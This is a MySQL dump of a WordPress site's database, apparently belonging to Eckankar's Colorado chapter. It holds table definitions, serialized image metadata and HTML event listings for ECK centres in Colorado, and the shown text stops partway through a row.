-- mysqldump-php https://github.com/ifsnop/mysqldump-php
--
-- Host: localhost	Database: eckank5_bgri484
-- ------------------------------------------------------
-- Server version 	10.6.16-MariaDB
-- Date: Tue, 21 Nov 2023 16:49:43 +0000

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpcl_wpgmza_maps`
--

DROP TABLE IF EXISTS `wpcl_wpgmza_maps`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpgmza_maps` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `map_title` varchar(256) NOT NULL,
  `map_width` varchar(6) NOT NULL,
  `map_height` varchar(6) NOT NULL,
  `map_start_lat` varchar(700) NOT NULL,
  `map_start_lng` varchar(700) NOT NULL,
  `map_start_location` varchar(700) NOT NULL,
  `map_start_zoom` int(10) NOT NULL,
  `default_marker` varchar(700) NOT NULL,
  `type` int(10) NOT NULL,
  `alignment` int(10) NOT NULL,
  `directions_enabled` int(10) NOT NULL,
  `styling_enabled` int(10) NOT NULL,
  `styling_json` mediumtext NOT NULL,
  `active` int(1) NOT NULL,
  `kml` varchar(700) NOT NULL,
  `bicycle` int(10) NOT NULL,
  `traffic` int(10) NOT NULL,
  `dbox` int(10) NOT NULL,
  `dbox_width` varchar(10) NOT NULL,
  `listmarkers` int(10) NOT NULL,
  `listmarkers_advanced` int(10) NOT NULL,
  `filterbycat` tinyint(1) NOT NULL,
  `ugm_enabled` int(10) NOT NULL,
  `ugm_category_enabled` tinyint(1) NOT NULL,
  `fusion` varchar(100) NOT NULL,
  `map_width_type` varchar(3) NOT NULL,
  `map_height_type` varchar(3) NOT NULL,
  `mass_marker_support` int(10) NOT NULL,
  `ugm_access` int(10) NOT NULL,
  `order_markers_by` int(10) NOT NULL,
  `order_markers_choice` int(10) NOT NULL,
  `show_user_location` int(3) NOT NULL,
  `default_to` varchar(700) NOT NULL,
  `other_settings` longtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpgmza_maps`
--

LOCK TABLES `wpcl_wpgmza_maps` WRITE;
/*!40000 ALTER TABLE `wpcl_wpgmza_maps` DISABLE KEYS */;
INSERT INTO `wpcl_wpgmza_maps` VALUES (1,'New Map','100','400','36.778261','-119.4179323999','45.950464398418106,-109.81550500000003',4,'',0,4,0,0,'',0,'',0,0,0,'',0,0,0,0,0,'','%','px',0,0,0,0,0,'','a:6:{s:8:\"map_type\";i:1;s:15:\"sl_stroke_color\";s:7:\"#FF0000\";s:13:\"sl_fill_color\";s:7:\"#FF0000\";s:17:\"sl_stroke_opacity\";i:1;s:15:\"sl_fill_opacity\";d:0.5;s:15:\"transport_layer\";N;}');
/*!40000 ALTER TABLE `wpcl_wpgmza_maps` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpgmza_maps` with 1 row(s)
--

--
-- Table structure for table `wpcl_postmeta`
--

DROP TABLE IF EXISTS `wpcl_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=196041 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_postmeta`
--

LOCK TABLES `wpcl_postmeta` WRITE;
/*!40000 ALTER TABLE `wpcl_postmeta` DISABLE KEYS */;
INSERT INTO `wpcl_postmeta` VALUES (143887,265198,'mec_location_id','119'),(5677,55589,'_menu_item_type','custom'),(5680,55589,'_menu_item_object','custom'),(5681,55589,'_menu_item_target',''),(5682,55589,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(68114,253344,'_wp_attached_file','2020/01/ocean-bkgrnd-homepg.jpg'),(68115,253344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:31:\"2020/01/ocean-bkgrnd-homepg.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"ocean-bkgrnd-homepg-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"ocean-bkgrnd-homepg-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"ocean-bkgrnd-homepg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:31:\"ocean-bkgrnd-homepg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:32:\"ocean-bkgrnd-homepg-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(68116,253344,'_edit_lock','1579204595:2'),(787,7163,'_menu_item_target',''),(786,7163,'_menu_item_object','page'),(5679,55589,'_menu_item_object_id','55589'),(143886,265198,'mec_color',''),(143885,265198,'protect_children',''),(859,7174,'boldgrid_page_id','2'),(858,7174,'boldgrid_in_page_containers','1'),(857,7174,'_wp_page_template','default'),(2193,7174,'bgseo_robots_index','index'),(143774,265165,'_field_31','(Jennings) Zubrin '),(143773,265165,'_field_30','Hope'),(2192,7174,'boldgrid_hide_page_title','0'),(2191,7174,'_wpac_nonmembers_redirect_to',''),(848,7172,'boldgrid_page_id','7'),(847,7172,'boldgrid_in_page_containers','1'),(843,7173,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(842,7173,'_menu_item_target',''),(841,7173,'_menu_item_object','page'),(840,7173,'_menu_item_object_id','7172'),(839,7173,'_menu_item_menu_item_parent','0'),(2531,51767,'_edit_lock','1563829517:1'),(776,7161,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(775,7161,'_menu_item_target',''),(774,7161,'_menu_item_object','page'),(773,7161,'_menu_item_object_id','7160'),(2184,45207,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2183,45207,'_menu_item_target',''),(2182,45207,'_menu_item_object','page'),(2181,45207,'_menu_item_object_id','7174'),(143771,265164,'_form_id','4'),(143772,265164,'_seq_num','13'),(772,7161,'_menu_item_menu_item_parent','0'),(771,7161,'_menu_item_type','post_type'),(785,7163,'_menu_item_object_id','7162'),(784,7163,'_menu_item_menu_item_parent','0'),(783,7163,'_menu_item_type','post_type'),(782,7160,'boldgrid_page_id','53'),(777,7161,'_menu_item_xfn',''),(778,7161,'_menu_item_url',''),(779,7160,'_wp_page_template','page_home.php'),(780,7160,'_wp_page_template','page_home.php'),(781,7160,'boldgrid_in_page_containers','1'),(789,7163,'_menu_item_xfn',''),(788,7163,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(793,7162,'boldgrid_page_id','1'),(792,7162,'boldgrid_in_page_containers','1'),(791,7162,'_wp_page_template','default'),(790,7163,'_menu_item_url',''),(10844,125664,'_wp_attached_file','2019/08/ECK_Temple_CO_015-lg-o.jpg'),(10845,125664,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:728;s:6:\"height\";i:463;s:4:\"file\";s:34:\"2019/08/ECK_Temple_CO_015-lg-o.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_015-lg-o-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-250x159.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-550x350.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-283x180.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-472x300.jpg\";s:5:\"width\";i:472;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_015-lg-o-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6819,78665,'_wc_gallery_custom_image_link',''),(10860,125672,'_wp_attached_file','2019/08/ECK_Temple_CO_023-lg.jpg'),(10861,125672,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_023-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_023-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1444235443\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10858,125671,'_wp_attached_file','2019/08/ECK_Temple_CO_023-A-lg.jpg'),(10859,125671,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:34:\"2019/08/ECK_Temple_CO_023-A-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_023-A-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:34:\"ECK_Temple_CO_023-A-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442685086\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6818,80323,'_wc_gallery_custom_image_link',''),(6817,80983,'_wc_gallery_custom_image_link',''),(1259,15203,'_rtbs_tabs_head','a:6:{i:0;a:2:{s:11:\"_rtbs_title\";s:23:\"Central Colorado Events\";s:13:\"_rtbs_content\";s:2069:\"<strong><span style=\"color: #23507d;\">CENTRAL COLORADO<img class=\"alignright size-full wp-image-1236\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/06/island_heart.jpg\" alt=\"\" width=\"119\" height=\"160\"></span></strong>\r\n\r\n<p><strong><span style=\"color: #23507d;\"><span style=\"font-size: 13pt;\">ECK Light &amp; Sound Service\r\n<span style=\"color: #f27a27; font-size: 12pt;\">“The Spiritual Nature of Relationships”</span>\r\n</span></span></strong><strong>Date/Time: </strong>Sunday, July 14, 10:30 am – 11:30 am\r\n<strong>Location: </strong>ECK Temple of Colorado\r\n<span style=\"color: #666666;\">The ECK Light and Sound Service is a community event offered by Eckankar for spiritual seekers of all faiths and religious backgrounds. It is an uplifting event where you can reflect on and connect with the divine aspect within yourself. </span><span style=\"color: #666666;\">You will hear inspiring spiritual stories, experience the HU chant, and be able to speak with other like-hearted spiritual seekers. </span><span style=\"color: #666666;\">Attend an ECK Light &amp; Sound Service to... </span></p>\r\n<p></p>\r\n<p><ul>\r\n 	<li><span style=\"color: #666666;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n 	<li><span style=\"color: #666666;\">Awaken to the divine guidance always within you</span></li>\r\n 	<li><span style=\"color: #666666;\">Open your heart to give and receive more divine love</span></li>\r\n 	<li><span style=\"color: #666666;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<span style=\"color: #666666;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step. For further information, call the ECK Temple of Colorado at 303-756-9287.</span>\r\n<a href=\"https://www.google.com/maps/place/7100+W+Mississippi+Ave,+Lakewood,+CO+80226/@39.6962662,-105.0758736,17z/data=!3m1!4b1!4m2!3m1!1s0x876b80e32b5b8d9b:0x3d736b1f2e624b96\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Driving Directions</strong></a><p></p>\";}i:1;a:2:{s:11:\"_rtbs_title\";s:23:\"Colorado Springs Events\";s:13:\"_rtbs_content\";s:1972:\"<p><strong><span style=\"color: #23507d;\">COLORADO SPRINGS</span></strong><img class=\"alignright size-full wp-image-5589\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2019/03/Autobiography-of-a-Modern-Prophet.png\" alt=\"\" width=\"116\" height=\"174\" /></p><p><strong><span style=\"color: #23507d;\"><span style=\"font-size: 13pt;\">Book Discussion</span><em><br /></em><span style=\"color: #f28a27; font-size: 12pt;\">\"<em>Autobiography of a Modern Prophet</em>\" </span></span></strong><span style=\"color: #23507d;\"><span style=\"color: #f28a27; font-size: 12pt;\"><span style=\"color: #666666;\">—by Harold Klemp</span></span></span><strong><br /></strong><strong>Date/Time:</strong> Sunday, July 14, 10:30 am - 11:30 am<br /><strong>Location: </strong>Colorado Springs ECK Center<br /><span style=\"color: #666666;\">Discover your own spiritual greatness. Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God. </span><span style=\"color: #666666;\"> This riveting story of Sri Harold Klemp’s climb up the Mountain of God is a landmark for the twenty-first century. Believe it or not, it is your destiny to discover your godlike nature. </span></p><p><span style=\"color: #666666;\"><em>Autobiography of a Modern Prophet</em> is a special compilation of Sri Harold’s three autobiographical books—<em>The Wind of Change</em>, <em>Soul Travelers of the Far Country</em>, and <em>Child in the Wilderness</em>. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God. Everyone is welcome. For further information, call the Colorado Springs Eckankar Center at 719-633-0453. </span> <br /><a href=\"https://www.google.com/maps/place/5245+Centennial+Blvd+100,+Colorado+Springs,+CO+80919/@38.9083951,-104.8626702,17z/data=!4m2!3m1!1s0x871351c932b555ff:0x8e93ed35d918ee3d?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Driving Directions</strong></a></p>\";}i:2;a:2:{s:11:\"_rtbs_title\";s:15:\"Loveland Events\";s:13:\"_rtbs_content\";s:1936:\"<p><strong><span style=\"color: #23507d;\"><img class=\"alignright size-full wp-image-2951\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/06/eck-parables-1-b.jpg\" alt=\"\" width=\"110\" height=\"168\" />LOVELAND</span></strong></p><p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">Book Discussion</span></strong></span><span style=\"color: #f28a27;\"><em><br /><span style=\"font-size: 12pt;\"><b>\"The ECK Parables\" </b></span></em><span style=\"font-size: 12pt;\"><span style=\"color: #666666;\">—by Harold Klemp</span></span><em><br /></em></span><strong>Date/Time: </strong>Sunday, July 14, 10:30 am – 11:30 am <br /><strong>Location:</strong> Loveland ECK Center<br /><span style=\"color: #666666;\">A parable is a universal story that \"brings home to us\" the meaning of \"spiritual living\". The ECK Parables are stories, put together in 4+ volumes by the current Living ECK Master, that address many common concerns that we might have about the spiritual purpose and meaning behind concrete life events. </span></p><p><span style=\"color: #666666;\">We are continuing our discussion of these parables, and we invite you to be part of this activity. In each session, there is a presentation of two or three parables from the ECK works that fit a particular theme; there are opportunities for participants to consider the meaning of the stories in relation to their own lives; and, there is time for participants to share stories from their own experiences that offered to them spiritual understanding or guidance. Materials will be provided. The public is welcome! For further information, call the Loveland ECK Center at 970-663-5302.</span><br /><strong> <a href=\"http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=1135+North+Lincoln+Avenue,+Loveland,+CO+80537&sll=37.0625,-95.677068&sspn=48.374125,71.982422&ie=UTF8&z=16\" target=\"_blank\" rel=\"noopener noreferrer\">Driving Directions</a></strong></p>\";}i:3;a:2:{s:11:\"_rtbs_title\";s:13:\"Pueblo Events\";s:13:\"_rtbs_content\";s:1945:\"<p><strong><span style=\"color: #23507d;\">PUEBLO</span></strong> <img class=\"alignright size-full wp-image-4424\" style=\"padding-left: 20px;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2018/01/sound-of-soul-tabs-2.png\" alt=\"\" width=\"128\" height=\"161\" /></p><p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">Experience The Sound of Soul</span> <br /></strong></span><strong>Date/Time: </strong>Friday, July 12, 7:00 pm – 7:30 pm <br /><strong>Location: </strong>Center for Inner Peace, 740 W. 15th Street, Pueblo, CO<br /><span style=\"color: #666666;\">Join us and experience the Sound of Soul. Discover your inner guidance, healing for body, mind, and spirit, and a higher form of creativity by chanting the sound of HU. </span><span style=\"color: #666666;\">HU is a sacred sound and ancient mantra. It is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. HU can uplift people of any religion, culture, or walk of life. You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart. Experience some of the many benefits of HU:</span></p><ul><li><span style=\"color: #666666;\">Inner peace and calm</span></li><li><span style=\"color: #666666;\">Divine love</span></li><li><span style=\"color: #666666;\">Expanded awareness</span></li><li><span style=\"color: #666666;\">Spiritual self-discovery and growth</span></li><li><span style=\"color: #666666;\">Healing of the heart</span></li></ul><p><span style=\"color: #666666;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br /><strong> <a href=\"https://www.google.com/maps/dir//740+West+15th+Street,+Pueblo,+CO+81003/@38.2805652,-104.6178421,19.46z/data=!4m8!4m7!1m0!1m5!1m1!1s0x8713a254051f6c79:0xb0b75cba1d5f202c!2m2!1d-104.6174346!2d38.2804526\" target=\"_blank\" rel=\"noopener noreferrer\">Driving Directions</a></strong></span></p>\";}i:4;a:2:{s:11:\"_rtbs_title\";s:32:\"Reality of Spiritual Experiences\";s:13:\"_rtbs_content\";s:1164:\"<p><strong><span style=\"color: #23507d; font-size: 13pt;\">Reality of Spiritual Experiences</span><span style=\"color: #23507d; font-size: 13pt;\"><a href=\"https://youtu.be/6ZAFB431-1g\" data-rokbox=\"\"><img 